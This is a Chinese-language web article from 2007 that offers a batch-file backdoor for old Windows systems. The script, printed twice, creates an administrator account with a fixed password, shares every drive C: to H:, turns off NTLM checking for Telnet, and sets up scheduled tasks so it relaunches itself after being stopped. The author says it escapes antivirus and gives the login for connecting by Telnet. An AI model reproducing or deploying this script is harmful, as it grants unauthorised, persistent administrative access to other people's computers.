用批處理寫的永不被殺的后門
更新時間:2007年05月15日 00:00:00 作者:
代碼思路是影子鷹DESERT朋友的,原代碼比較麻煩,我做了改進,這個后門優(yōu)點就是小而且不會被殺,放到SYSTEM32目錄下就可以了 ,代碼如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
這樣就會循環(huán)運行我們的程序了,即使被人停下來,過幾個小時,又回重新運行,呵呵~~
運行后TELNET IP上去,用戶名為xyt,密碼為hacker。
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
這樣就會循環(huán)運行我們的程序了,即使被人停下來,過幾個小時,又回重新運行,呵呵~~
運行后TELNET IP上去,用戶名為xyt,密碼為hacker。
相關文章
dos進程查看與停止命令分享(tasklist,taskkill)
有時候我們需要dos下查看與停止進程,那么就需要一些dos命令,常見的命令有tasklist,taskkill等2012-06-06windows下使用批處理實現(xiàn)切換JDK環(huán)境變量
這篇文章主要介紹了windows下使用批處理實現(xiàn)切換JDK環(huán)境變量的相關資料,需要的朋友可以參考下2015-03-03